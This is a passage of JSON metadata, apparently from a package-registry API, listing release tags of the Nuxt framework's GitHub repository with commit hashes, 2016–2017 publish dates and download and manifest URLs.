https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661e